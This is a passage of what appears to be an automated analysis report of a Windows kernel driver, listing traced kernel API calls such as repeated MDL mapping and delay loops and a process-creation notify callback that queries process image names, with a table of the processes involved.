| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a283a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a283a40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8750 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8750, MemoryDescriptorList_unk_out = 0xffffe0003c1f8750 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8750, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a2dca40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a2dca40, MemoryDescriptorList_unk = 0xffffe0003c1f8750 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8750 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a796a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a796a40, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c42ba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c42ba40, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c4f1a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c4f1a40, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c65ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c65ea40, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c999a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c999a40, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002cd74a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002cd74a40, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002cf66a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002cf66a40, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002e56ba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e56ba40, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00032efba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00032efba40, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00049a6da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00049a6da40, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0004a71da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0004a71da40, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd000291c8a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd000291c8a40, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd000294cca40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd000294cca40, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029836a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029836a40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a43aa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a43aa40, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a787a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a787a40, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b92aa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b92aa40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c80da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c80da40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002cecda40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002cecda40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c4fb1f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c4fb1f0, MemoryDescriptorList_unk_out = 0xffffe0003c4fb1f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c4fb1f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002d7a0a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d7a0a40, MemoryDescriptorList_unk = 0xffffe0003c4fb1f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c4fb1f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000 |
Code Block #4 (EP #3, #17, #60)
»
| Information | Value |
|---|---|
| Trigger | PspCallProcessNotifyRoutines+0x198 |
| Start Address | 0xfffff800fc2caa50 |
Execution Path #3 (length: 64, count: 21, processes: 18)
»
| Information | Value |
|---|---|
| Sequence Length | 64 |
Processes
»
| Process | Count |
|---|---|
| Process 106 (sc.exe, PID: 3920) | 1 |
| Process 14 (svchost.exe, PID: 1296) | 1 |
| Process 20 (svchost.exe, PID: 3092) | 1 |
| Process 4 (svchost.exe, PID: 628) | 4 |
| Process 110 (dllhost.exe, PID: 2832) | 1 |
| Process 108 (UNKNOWN, PID: UNKNOWN) | 1 |
| Process 41 (backgroundtaskhost.exe, PID: 1124) | 1 |
| Process 44 (hxtsr.exe, PID: 3844) | 1 |
| Process 113 (backgroundtaskhost.exe, PID: 3936) | 1 |
| Process 112 (backgroundtaskhost.exe, PID: 3212) | 1 |
| Process 7 (svchost.exe, PID: 888) | 1 |
| Process 25 (winlogon.exe, PID: 508) | 1 |
| Process 115 (cmd.exe, PID: 1224) | 1 |
| Process 114 (mpcmdrun.exe, PID: 4164) | 1 |
| Process 116 (UNKNOWN, PID: UNKNOWN) | 1 |
| Process 37 (taskhostw.exe, PID: 3804) | 1 |
| Process 111 (dllhost.exe, PID: 4116) | 1 |
| Process 18 (sppsvc.exe, PID: 3908) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x500, Tag = 0x776f6f, ret_val_ptr_out = 0xffffe0003c6342f0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x500, Tag = 0x776f6f, ret_val_ptr_out = 0xffffe0003a763010 |
| PsLookupProcessByProcessId | ProcessId_unk = 0xf50, Process_unk_out = 0xffffd00032fe7f08, ret_val_out = 0x0 |
| PsGetProcessInheritedFromUniqueProcessId | ret_val_out = 0x3e8 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00032fe7cc0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00032fe7cb0, ClientId_deref_UniqueProcess_unk = 0xf50, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00032fe7d08, ProcessHandle_out = 0xffffffff80001064, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001064, ProcessInformationClass_unk = 0x1a, ProcessInformationLength = 0x8, ProcessInformation_ptr_out = 0xffffd00032fe7d10, ReturnLength_ptr_out = 0xffffd00032fe7d00, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001064, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = PsGetProcessPeb, DestinationString_out = PsGetProcessPeb |
| MmGetSystemRoutineAddress | SystemRoutineName = PsGetProcessPeb, ret_val_ptr_out = 0xfffff8004175a98c |
| PsGetProcessPeb | ret_val_out = 0x3db000 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00032fe7c50, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00032fe7c40, ClientId_deref_UniqueProcess_unk = 0xf50, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00032fe7cb0, ProcessHandle_out = 0x4c, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x4c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00032fe7ca0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634270 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x4c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x70, ProcessInformation_ptr_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00032fe7ca0, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = sc.exe, DestinationString_out = sc.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634250 |
| RtlCopyUnicodeString | SourceString = sc.exe, DestinationString_out = sc.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 |
| ZwClose | Handle_unk = 0x4c, ret_val_out = 0x0 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00032fe7c50, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00032fe7c40, ClientId_deref_UniqueProcess_unk = 0x3e8, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00032fe7cb0, ProcessHandle_out = 0x4c, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x4c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00032fe7ca0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x4c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd00032fe7ca0, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = svchost.exe, DestinationString_out = svchost.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x18, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634190 |
